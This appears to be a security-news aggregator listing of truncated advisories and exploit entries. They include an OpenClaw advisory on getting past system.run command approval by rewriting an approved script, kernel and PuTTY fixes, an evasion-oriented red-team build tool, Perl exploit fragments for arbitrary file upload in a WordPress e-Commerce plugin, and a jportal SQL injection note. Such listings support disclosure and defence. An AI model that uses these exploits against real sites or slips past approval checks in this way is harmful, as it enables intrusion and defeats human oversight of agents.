OpenClaw: Unrecognized script runners could bypass `system.run` approval integrity

Summary In affected versions of openclaw, node-host system.run approvals did not bind a mutable file operand for some script runners, including forms such as tsx and jiti. An attacker could obtain approval for a benign script-runner command, rewrite the referenced script on disk, and have the...

CVE-2024-50147 net/mlx5: Fix command bitmask initialization

In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix command bitmask initialization Command bitmask have a dedicated bit for MANAGEPAGES command, this bit isn't Initialize during command bitmask Initialization, only during MANAGEPAGES. In addition,...

OffensivePipeline - Allows You To Download And Build C# Tools, Applying Certain Modifications In Order To Improve Their Evasion For Red Team Exercises

OfensivePipeline allows you to download and build C tools, applying certain modifications in order to improve their evasion for Red Team exercises. A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the...

OPENSUSE-SU-2019:1123-1 Security update for putty

This update for putty fixes the following issues: Update to new upstream release 0.71 boo1129633 CVE-2019-9894: Fixed a remotely triggerable memory overwrite in RSA key exchange, which can occur before host key verification potential recycling of random numbers used in cryptography. CVE-2019-9895...

Wordpress Plugin e-Commerce <= 3.4 - Arbitrary File Upload Exploit

No description provided by source. !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . .php; no int print INTRO; messy print i know.. - Wordpress Plugin e-Commerce = 3.4 Arbitrary File Upload - Discovered && Coded by: t0pP8uZz Discovered...

wpecomm-upload.txt

!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . ".php"; no int print ; print "\nEnter File Pathpath to local file to upload: "; chompmy $file=; my $ua = LWP::UserAgent-new; my $re = $ua-requestPOST $url...

WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload

WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . ".php"; no int print ; print "\nEnter File Pathpath to local file to upload: "; chompmy $file=; my $ua = LWP::UserAgent-new; my $...

jportal.txt

Jportal is a portal system, quite commonly used: Google Results 1 - 10 of about 56,100 for "powered by jportal". 0.22 seconds Homepage: http://jportal2.com/ I've read its code and found: in module/print.inc.php: function artprint .... $query = "SELECT FROM $arttbl WHERE id=$id"; ... What to say? ...